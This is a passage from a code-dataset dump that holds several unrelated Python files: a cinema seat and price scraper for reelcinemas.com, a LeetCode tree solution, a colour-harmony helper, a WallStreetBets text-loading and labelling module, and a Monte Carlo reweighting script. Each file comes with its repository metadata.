movie_session,\n # }\n response = await get_html(session, url)\n t = json.loads(response)\n experience = extract_experience(t)\n area_entity_list = t[\"Sourcedata\"][\"AreaEntityList\"]\n ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n seats_list = []\n if area_entity_list:\n for area_entity in area_entity_list:\n area_code = area_entity[\"AreaCode\"]\n area_description = area_entity[\"AreaDescription\"]\n row_entity_list = area_entity[\"rowEntityList\"]\n\n empty_count = sum(1 for row_entity in row_entity_list for seat_entity in 
row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Empty\")\n sold_count = sum(1 for row_entity in row_entity_list for seat_entity in row_entity[\"seatEntityList\"] if\n seat_entity[\"Status\"] == \"Sold\")\n for ticket in ticket_list:\n if ticket[\"AreaCode\"] == area_code:\n price_in_aed = ticket[\"PriceInAed\"]\n print(f\"AreaCode: {area_code}, AreaDescription: {area_description}\")\n print(f\"Empty Count: {empty_count}, Sold Count: {sold_count}, {price_in_aed}\")\n seats_price = [area_description, empty_count, sold_count, experience, price_in_aed]\n print(seats_price)\n seats_list.append(seats_price)\n return seats_list\n\n\n# async def get_seating_info(session: aiohttp.ClientSession):\n# try:\n# url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n# response = await get_html(session, url)\n# t = json.loads(response)\n# experience = extract_experience(t)\n# s = response.replace('\"', '').lower()\n# num_empty = extract_num_empty(s)\n# num_sold = extract_num_sold(s)\n# ticket_list = t.get(\"Sourcedata\").get(\"TicketList\", [])\n# ticket_descriptions = [ticket[\"TicketDescription\"] for ticket in ticket_list]\n# ticket_prices = [ticket[\"PriceInAed\"] for ticket in ticket_list]\n# return num_empty, num_sold, experience, ticket_descriptions, ticket_prices\n# except Exception as e:\n# print(\"Inside get_seating_info exception\")\n# print(e)\n\n\nasync def get_seats(showtimes):\n seats = []\n try:\n magic_string = showtimes[-2]\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n\n # In order not to work with cookies manually, we start a new session.\n # Session cookies persist throughout the session. Same functionality in the requests.Session class\n async with aiohttp.ClientSession(connector=connector, headers=HEADERS, timeout=timeout) as new_session:\n url = \"https://reelcinemas.com/en-ae/\"\n await get_html(new_session, url)\n\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n await post_request(new_session, url, json=magic_string)\n seating_info = await get_seating_info(new_session)\n\n try:\n if seating_info:\n for sp in seating_info:\n num_empty = sp[1]\n num_sold = sp[2]\n seats_area = sp[0]\n num_total = num_empty + num_sold\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}\")\n country = showtimes[0]\n movie_name = showtimes[1]\n cinema_title = showtimes[2]\n showtime = showtimes[3]\n scraping_date = showtimes[4]\n processing_date = showtimes[5]\n movie_language = showtimes[7]\n experience = sp[3]\n ticket_prices = sp[4]\n\n print(f\"{showtimes[1]}--{showtimes[2]}--{showtimes[3]}--{num_total}--{experience}--{ticket_prices}\")\n total = [country, movie_name, cinema_title, showtime, seats_area, num_total, num_sold, experience,\n ticket_prices, scraping_date, processing_date, movie_language]\n print(total)\n seats.append(total)\n return seats\n except Exception as e:\n print(\"INSIDE INSIDE INSIDE...\")\n print(e)\n pass\n except ConnectionError:\n print(\"Connection error...\")\n print(\"break...\")\n pass\n\n\nasync def get_showtimes_by_date(session: aiohttp.ClientSession, movie, date: datetime.date, code) -> List:\n showtimes = []\n params = {\n \"movieId\": movie[2],\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"cinemas\": code\n }\n url = urllib.parse.urljoin(MAIN_PAGE, \"MovieDetails/GetMovieShowTimes\")\n response = await post_request(session, url, params=params)\n # with 
open('/Users/n.purushottam.lagad/Downloads/reel_show.txt','w') as file:\n # file.write(html)\n response_json = json.loads(response)\n soup = BeautifulSoup(response_json, \"lxml\")\n if \"No Schedules found\" in response:\n return []\n\n a = soup.find_all('a')\n for a_tag in a:\n if a_tag.get(\"onclick\"):\n magic_string = re.search(r'\"([^\"]*)\"', a_tag.get(\"onclick\")).group(1)\n elif a_tag.get(\"href\"):\n magic_string = a_tag.get(\"href\").split(\"','\")[6]\n else:\n raise ValueError(\"Showtime parsing error. Unexpected html\")\n\n showtime = a_tag.find('div', class_='showtime').text\n print('magic_string:', magic_string)\n print('showtime:', showtime)\n print('---')\n # time_obj = datetime.strptime(time_a, \"%I:%M %p\").time()\n # url = urllib.parse.urljoin(MAIN_PAGE, time_a.get(\"href\"))\n # datetime_obj = datetime.combine(date, time_obj)\n movie_name = movie[0]\n movie_language = movie[3]\n if params['cinemas'] == '0001':\n cinema_title = 'The Dubai Mall'\n if params['cinemas'] == '0002':\n cinema_title = 'Dubai Marina Mall'\n if params['cinemas'] == '0006':\n cinema_title = 'The Springs Souk'\n print(f\"{movie_name}--{cinema_title}--{showtime}\")\n country = MAIN_PAGE.split(\"/\")[3]\n current_date = date.today()\n scraping_date = datetime.now().strftime('%Y%m%d %H:%M')\n processing_date = current_date.strftime(\"%Y%m%d\")\n\n total = [country, movie_name, cinema_title, showtime, scraping_date, processing_date,\n magic_string, movie_language]\n print(total)\n showtimes.append(total)\n return showtimes\n\n\nasync def get_movie_showtimes(session: aiohttp.ClientSession, movie, query_date_str: str):\n movie_html = await get_html(session, movie[1])\n # with open('/Users/n.purushottam.lagad/Downloads/reel_movie_show.txt','w') as file:\n # file.write(movie_html)\n soup = BeautifulSoup(movie_html, \"lxml\")\n # language_id = soup.find(\"input\", {\"id\": \"SelectedLanguageId\"}).get(\"value\")\n # movie = movie._replace(language_id=language_id)\n\n available_date_items = soup.findAll(\"div\", class_=\"dboxelement\")\n showtimes = []\n cinema_code = ['0001', '0002', '0006']\n for date_item in available_date_items:\n date_str = date_item.get('id')\n if date_str != query_date_str:\n continue\n date_obj = datetime.strptime(date_str, \"%Y-%m-%d\").date()\n for code in cinema_code:\n showtimes += await get_showtimes_by_date(session, movie, date_obj, code)\n logging.info(f\"Received {len(showtimes)} showtimes for {movie[0]}\")\n return showtimes\n\n\nasync def get_all_showtimes(session: aiohttp.ClientSession,\n movies,\n date_str: str): ## create separate task for each movie to get showtimes\n tasks = []\n for movie in movies:\n task = asyncio.create_task(get_movie_showtimes(session, movie, date_str))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes.\")\n return results\n\n\nasync def get_all_seats(movie_showtimes):\n tasks = []\n for show in movie_showtimes:\n task = asyncio.create_task(get_seats(show))\n tasks.append(task)\n showtimes = await asyncio.gather(*tasks)\n results = []\n for showtime in showtimes:\n results += showtime\n logging.info(f\"Summary received {len(results)} showtimes in final layer.\")\n return results\n\n\nasync def main(date_str):\n connector = aiohttp.TCPConnector(force_close=True, limit=TCPCONNECTOR_LIMIT)\n timeout = aiohttp.ClientTimeout(total=SESSION_TIMEOUT_SEC)\n async with aiohttp.ClientSession(connector=connector, 
headers=HEADERS, timeout=timeout) as session:\n # total_movies = []\n # start_time = time.time()\n # asp_net_cookie = get_asp_net_cookie()\n movies = await get_movies(session)\n movie_showtimes = await get_all_showtimes(session, movies, date_str)\n movie_seats = await get_all_seats(movie_showtimes)\n\n return movie_seats\n # df1 = pd.DataFrame(data=movie_seats,\n # columns=['country', 'movie_name', 'cinema_title', 'show_time', 'seats_area', 'seats_total',\n # 'seats_sold', 'experience', 'ticket_prices', 'scraping_date',\n # 'processing_date', 'movie_language'])\n # df1.to_csv(\"reel_final5.csv\")\n\n\ndef calling_main(date_str):\n showtimes = asyncio.new_event_loop()\n showtimes = showtimes.run_until_complete(main(date_str))\n\n\ndef save_to_django_db(task: ScraperTask):\n logging.info(f\"Start task for {task.cinema_provider.name} {task.id}\")\n search_date_str = task.date_query.strftime(\"%Y-%m-%d\")\n showtimes = asyncio.run(main(search_date_str))\n\n for showtime in showtimes:\n country, created = Country.objects.get_or_create(name=showtime[0])\n cinema, created = Cinema.objects.get_or_create(name=showtime[2], country=country)\n movie, created = DjangoMovie.objects.get_or_create(name=showtime[1], language=showtime[11])\n\n showtime_time_obj = datetime.strptime(showtime[3], '%I:%M %p')\n showtime_datetime_obj = datetime.combine(task.date_query, showtime_time_obj.time())\n ShowtimeSeats.objects.create(\n task=task,\n cinema=cinema,\n movie=movie,\n datetime=showtime_datetime_obj,\n experience=showtime[7],\n all=showtime[5],\n sold=showtime[6],\n price=showtime[8],\n area=showtime[4],\n )\n","repo_name":"LopatKing/cinema-scrapers","sub_path":"django/scrapers/reelcinema.py","file_name":"reelcinema.py","file_ext":"py","file_size_in_byte":16603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7428325483","text":"# LeetCode imports\nfrom LeetCode.GlobalStructures import TreeNode\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def maximumAverageSubtree(self, root: Optional[TreeNode]) -> float:\n '''\n Initial and Optimal\n '''\n max_avg = 0\n \n def AvgUsingDFS(node):\n nonlocal max_avg\n \n if not node:\n return 0, 0\n \n left_count, left_sum = AvgUsingDFS(node.left)\n right_count, right_sum = AvgUsingDFS(node.right)\n curr_count = left_count + 1 + right_count\n curr_sum = left_sum + node.val + right_sum\n \n max_avg = max(max_avg, curr_sum / curr_count)\n return curr_count, curr_sum\n \n AvgUsingDFS(root)\n return max_avg","repo_name":"PyroGenesis/Comprehensive-Coding-Solutions","sub_path":"LeetCode/1120-Maximum-Average-Subtree.py","file_name":"1120-Maximum-Average-Subtree.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29999432047","text":"\ndef colour_harmony(anchor, c):\n colours=[\"red\",\"red-orange\",\"orange\",\"yellow-orange\",\"yellow\",\"yellow-green\"]\n colours+=[\"green\",\"blue-green\",\"blue\",\"blue-violet\",\"violet\",\"red-violet\"]\n \n combs = {}\n combs[\"complementary\"] = [0,6]\n combs[\"analogous\"] = [0,1,-1]\n combs[\"split_complementary\"] = [0,5,-5]\n combs[\"triadic\"] = [0,4,-4]\n combs[\"rectangle\"] = [0,2,6,-4]\n combs[\"square\"] = [0,3,6,-3]\n \n r = colours.index(anchor)\n return {colours[(r+i)%12] for i in combs[c]}\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"md4AF8HwJrhrhA5zm_10.py","file_name":"md4AF8HwJrhrhA5zm_10.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1741105788","text":"## Vocab Primer\nimport os\nimport sys\nimport nltk\nfrom nltk import word_tokenize\nnltk.download('punkt')\nfrom tqdm import tqdm\nimport torch\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nfrom datetime import datetime, timedelta, date\n\n\n\nfrom scipy.sparse import csr_matrix\nimport numpy as np\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\n\nclass Vocab():\n\tdef __init__(self):\n\t\tself.locked = False\n\t\tself.nextID = 0\n\t\tself.word2id = {}\n\t\tself.id2word = {}\n\n\tdef get_id(self, word):\n\t\tif not word in self.word2id:\n\t\t\tif self.locked:\n\t\t\t\treturn -1 \t# UNK token\n\t\t\telse:\n\t\t\t\tself.word2id[word] = self.nextID\n\t\t\t\tself.id2word[self.word2id[word]] = word\n\t\t\t\tself.nextID += 1\n\t\treturn self.word2id[word]\n\n\tdef has_word(self, word):\n\t\treturn self.word2id.has_key(word)\n\n\tdef has_id(self, wid):\n\t\treturn self.word2.has_key(wid)\n\n\tdef get_word(self, wid):\n\t\treturn self.id2word[wid]\n\n\tdef save_vocab(self, vocabFile):\n\t\tfOut = open(vocabFile, 'w')\n\t\tfor word in self.word2id.keys():\n\t\t\tfOut.write(\"%s\\t%s\\n\" % (word, self.word2id[word]))\n\n\tdef get_vocab_size(self):\n\t\t#return self.nextId-1\n\t\treturn self.nextID\n\n\tdef get_words(self):\n\t\treturn self.word2id.keys()\n\n\tdef lock(self):\n\t\tself.locked = True\n\ndef create_vocab(wsb_data):\n vocab = Vocab()\n for item in wsb_data:\n tokenized_item = word_tokenize(item)\n for word in tokenized_item:\n id = vocab.get_id(word.lower())\n vocab.lock()\n return vocab\n\ndef load_csv(csv_file_path, type_=None):\n\tif type_ == \"reddit\" or type_ == None:\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\t\tdata = data[[\"title\", \"score\", \"comms_num\", \"timestamp\"]]\n\n\tif type_ == \"twitter\":\n\t\tdata = pd.read_csv(csv_file_path, delimiter=\",\")\n\n\treturn data\n\n\nclass WSBData():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\t\tself.lowest_bound = -999999\n\t\tself.get_stats_wsb()\n\n\t\t# if train:\n\t\t# \tdataframe = dataframe.iloc[rows//4:, :]\n\t\t# else:\n\t\t# \tdataframe = dataframe.iloc[:rows//4, :]\n\n\t\t#For csr_matrix (see http://docs.scipy.org/doc/scipy-0.15.1/reference/generated/scipy.sparse.csr_matrix.html#scipy.sparse.csr_matrix)\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(dataframe))):\n\t\t\trow = dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 
0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tsentiment_value = self.sentiment_function(row)\n\n\t\t\tif sentiment_value == \"very-bearish\":\n\t\t\t\tY.append(0)\n\t\t\telif sentiment_value == \"bearish\":\n\t\t\t\tY.append(1)\n\t\t\telif sentiment_value == \"neutral\":\n\t\t\t\tY.append(2)\n\t\t\telif sentiment_value == \"bullish\":\n\t\t\t\tY.append(3)\n\t\t\telif sentiment_value == \"very-bullish\":\n\t\t\t\tY.append(4)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef sentiment_function(self, df_row):\n\t\t# import pdb; pdb.set_trace()\n\t\tscore = df_row[1]\n\t\tcomments = df_row[2]\n\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\t\ttheta1 = 0.50\n\t\ttheta2 = 0.50\n\n\t\tsentiment = theta1*score + theta2*comments\n\t\t# import pdb; pdb.set_trace()\n\t\tbound1, bound2, bound3, bound4, bound5 = tuple(self.func_percentiles)\n\t\t# know i could have just made it return a number, but thought\n\t\t# i'd keep it string match to get a general concept across\n\t\tif sentiment >= bound1 and sentiment < bound2:\n\t\t\treturn 'bearish'\n\t\telif sentiment >= bound2 and sentiment < bound3:\n\t\t\treturn 'neutral'\n\t\telif sentiment >= bound3 and sentiment < bound4:\n\t\t\treturn 'bullish'\n\t\telif sentiment >= bound4 and sentiment < bound5:\n\t\t\treturn 'very-bullish'\n\t\telse:\n\t\t\treturn \"very-bearish\"\n\n\tdef get_stats_wsb(self, plot=False):\n\t\tscore = self.dataframe.iloc[:, 1].to_numpy()\n\t\tcomments = self.dataframe.iloc[:, 2].to_numpy()\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\n\t\ttheta1 = .50\n\t\ttheta2 = .50\n\t\tfunc = theta1 * score + theta2 * comments\n\t\tself.lowest_bound = func.min()\n\t\tprint(self.lowest_bound)\n\n\n\t\t## all pareto distributions which really shouldn't come as too\n\t\t## much of a surprise --\n\t\tif plot:\n\t\t\thist1 = plt.hist(score, bins=100, range=(0, 500))\n\t\t\thist2 = plt.hist(comments, bins=100, range=(0, 500))\n\t\t\tplt.show()\n\n\t\tscore_percentiles = []\n\t\tcomment_percentiles = []\n\t\tfunc_percentiles = []\n\t\tfor perc in range(0, 100, 20):\n\t\t\ts_perc = np.percentile(score, perc)\n\t\t\tc_perc = np.percentile(comments, perc)\n\t\t\tf_perc = np.percentile(func, perc)\n\t\t\tscore_percentiles.append(s_perc)\n\t\t\tcomment_percentiles.append(c_perc)\n\t\t\tfunc_percentiles.append(f_perc)\n\n\t\tself.score_percentiles = score_percentiles\n\t\tself.comment_percentiles = comment_percentiles\n\t\tself.func_percentiles = func_percentiles\n\t\tprint(self.func_percentiles)\n\n\nclass TwitterData():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif 
dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tY.append(row[1])\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\nclass WSBDataLarge():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tstock_df = pd.read_csv(\"../data/GME.csv\")\n\t\tself.stock_price(stock_df)\n\n\n\t\tself.dataframe[\"timestamp\"] = pd.to_datetime(self.dataframe[\"timestamp\"], format='%Y-%m-%d %H:%M:%S')\n\n\t\tisBusinessday = BDay().onOffset\n\t\tmatch_series = self.dataframe[\"timestamp\"].map(isBusinessday)\n\t\tself.dataframe = self.dataframe[match_series].copy()\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\t### Add Y logic\n\n\t\t\treddit_date = row[-1] + timedelta(days=1)\n\t\t\t#reddit_date_mon = row[-1] + timedelta(days=2)\n\t\t\tstr_time = reddit_date.strftime('%m') + '-' + 
reddit_date.strftime('%d')\n\t\t\t#str_time_mon = reddit_date_mon.strftime('%m') + '-' + reddit_date_mon.strftime('%d')\n\n\n\t\t\t# need to figure out the fix for Friday to Saturday\n\t\t\ttry:\n\t\t\t\tlabel = self.gme_stock_dict[str_time]\n\t\t\t\tY.append(label)\n\t\t\texcept:\n\t\t\t\t#Y.append(self.gme_stock_dict[str_time_mon])\n\t\t\t\tY.append(0)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef stock_price(self, dataframe):\n\t\tdataframe[\"Date\"] = pd.to_datetime(dataframe[\"Date\"], format='%Y-%m-%d %H:%M:%S')\n\t\t# start_date = min(self.dataframe['timestamp']) not working for some reason\n\t\tstart_date = \"2021-01-28 00:00:00\"\n\t\tdf = dataframe[[\"Date\", \"Open\", \"Close\", \"High\"]]\n\t\tdf = df[df[\"Date\"] >= start_date]\n\t\tdf[\"Date_str\"] = df[\"Date\"].dt.strftime('%m') + '-' + df[\"Date\"].dt.strftime('%d')\n\n\t\tdf['Up_Down'] = np.where((df[\"High\"] - df[\"Open\"]) > 0, 1, 0)\n\n\t\tprint(df.head)\n\t\tself.gme_stock_dict = pd.Series(df['Up_Down'].values, index=df.Date_str)\n\n\n\nif __name__ == '__main__':\n\twsb_file_path = \"../data/reddit_wsb.csv\"\n\twsb_data = load_csv(wsb_file_path)\n\tvocab = create_vocab(wsb_data['title'].values)\n\n\tsplit_point = int(len(wsb_data)*0.9)\n\ttrain_df = wsb_data[0:split_point]\n\tdev_df = wsb_data[split_point:]\n\tprint(train_df)\n\n\tprint(\"load train data\")\n\ttrain_data = WSBDataLarge(wsb_file_path, dataframe=train_df, vocab=vocab, train=True)\n\tdev_data = WSBDataLarge(wsb_file_path, dataframe=dev_df, vocab=vocab, train=False)\n\tdev_labels = dev_data.Y\n\tdev_unique, dev_counts = np.unique(dev_labels, return_counts=True)\n\n\tlabels = train_data.Y\n\tunique_labels, counts = np.unique(labels, return_counts=True)\n\tprint(unique_labels)\n\tprint(counts)\n\tplt.figure()\n\tplt.bar(unique_labels, counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Training Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\n\tplt.figure(1)\n\tplt.bar(dev_unique, dev_counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Eval Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\t# test = WSBDataLarge(\"../data/reddit_data.csv\")\n","repo_name":"ctyler9/natural-language-spring-2021","sub_path":"model/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"17161748857","text":"#!/usr/bin/env python\nimport os\nimport argparse\nimport json\nimport time\n\nimport numpy as np\n\nfrom libspi.Genome import *\nfrom libspi.MonteCarloSampler import *\nimport libspi.IO as IO\nimport libspi.CommandLineUtils as cli\n\n##############################################################\n# CMD line options parser\n##############################################################\n\n\ndef parse_command_line_options():\n parser = argparse.ArgumentParser(\n description='Monte Carlo reweighting for Cre-Lox Recombination studies.')\n parser.add_argument('--input-file', '-i', type=str,\n help=\"Chromosome file structure. Chromosome is assumed to be circular.\")\n parser.add_argument('--output-file', '-o', type=str,\n required=True, help=\"Output file\")\n parser.add_argument('--trajectory-file', '-t', type=str,\n required=True, help=\"Trajectory file\")\n # parser.add_argument('--config', '-c', type=str, required=True, help=\"Simulation configuration file\")\n parser.add_argument('--lb', type=float, required=True,\n help=\"Lambda parameter\")\n parser.add_argument('--nu', type=float, required=True, help=\"Nu parameter\")\n parser.add_argument('--b', type=float, required=True, help=\"B parameter\")\n parser.add_argument('--rl', type=float, required=True,\n help=\"Reweighting radius for lambda parameter\")\n parser.add_argument('--rnu', type=float, required=True,\n help=\"Reweighting radius for nu parameter\")\n parser.add_argument('--rb', type=float, required=True,\n help=\"Reweighting radius for b parameter\")\n options = parser.parse_args()\n return options\n\n\n##############################################################\n# MAIN method\n##############################################################\nif __name__ == \"__main__\":\n #\n options = parse_command_line_options()\n # config = cli.load_configuration_file(options.config)\n\n # building the parameters grid\n # param_grid = cli.build_parameters_grid(config)\n param_grid = [(options.lb, options.nu, options.b)]\n\n print(\"Using %d parameters settings.\" % len(param_grid))\n\n # creating and loading genome structure file\n genome = Genome()\n genome.load_genome_from_file(options.input_file)\n\n # loading trajectory pool\n trajectory_pool = IO.load_trajectories_from_file(options.trajectory_file)\n filtered_pool = dict()\n\n for curr_param, curr_traj in trajectory_pool.items():\n c_l, c_nu, c_b = curr_param\n if (np.abs(c_l - options.lb) <= options.rl) and \\\n (np.abs(c_nu - options.nu) <= options.rnu) and \\\n (np.abs(c_b - options.b) <= options.rb):\n filtered_pool[curr_param] = curr_traj\n\n print(\"Reweighting using %d simulations.\" % len(filtered_pool.keys()))\n # creating the MC sampler\n mc = ReweightGridMonteCarloSampler(genome)\n\n # running and timing the sampler\n # t_start = time.time()\n trajectory_profile = mc.run(filtered_pool, param_grid)\n # t_elapsed = time.time() - t_start\n\n # saving objects to file\n IO.save_profiles_to_file(\n options.output_file, trajectory_profile, vars(options))\n","repo_name":"stracquadaniolab/spi-nf","sub_path":"bin/spi-reweight.py","file_name":"spi-reweight.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
